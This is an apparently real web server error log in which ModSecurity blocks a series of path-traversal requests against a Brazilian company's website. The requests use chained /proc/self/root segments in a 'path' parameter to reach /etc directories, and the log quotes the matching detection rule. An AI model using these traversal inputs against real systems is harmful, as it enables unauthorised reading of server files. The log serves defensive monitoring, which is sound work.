[Mon Mar 16 11:17:32.769215 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:53038] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ_LABkC4fWIHEf8HixwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:34.059309 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:53046] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ_rABkC4fWIHEf8HiyAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:35.039223 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.241.46:51076] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ_wlT9VtDQc7bgUyliAAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:17:35.336167 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:53052] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgQ_46lpbStxTqkSktkpAAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:36.599357 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:53056] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRALABkC4fWIHEf8HiygAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:37.928011 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:53070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRARXjF1vJNtV6CWrvLAAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:39.211182 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.243.203:53080] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRA3jZBu2q05ozVU9NkgAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:40.510827 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.243.203:58184] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRBI6lpbStxTqkSktkpQAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:41.846398 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:58198] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRBbABkC4fWIHEf8HiywAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:43.140770 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:58210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRB_9ocpUE4ed4uDzlYAAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:43.297248 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:45854] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRB_9ocpUE4ed4uDzlYQAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:17:44.416868 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:58218] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRCJqj1wV0Si-OkefjAwAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:45.752215 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.243.203:58232] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRCXjZBu2q05ozVU9NlAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:47.699513 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.241.46:44336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRC3bQATo66fKoS7xFrgAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:17:48.124088 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:58244] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRDI6lpbStxTqkSktkqQAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:49.423130 2026] [:error] [pid 10709:tid 140411741927168] [client 74.7.243.203:58246] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRDRXjF1vJNtV6CWrvLgAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:50.737032 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.243.203:59432] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRDglT9VtDQc7bgUyliQAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:53.269949 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:59442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgREHjZBu2q05ozVU9NlQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:54.598205 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.243.203:59454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRErABkC4fWIHEf8HizAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:55.716943 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:59460] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgREwlT9VtDQc7bgUyligAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:56.006382 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:59460] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRFAlT9VtDQc7bgUyliwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:17:56.387856 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:33452] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgRFI6lpbStxTqkSktksAAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
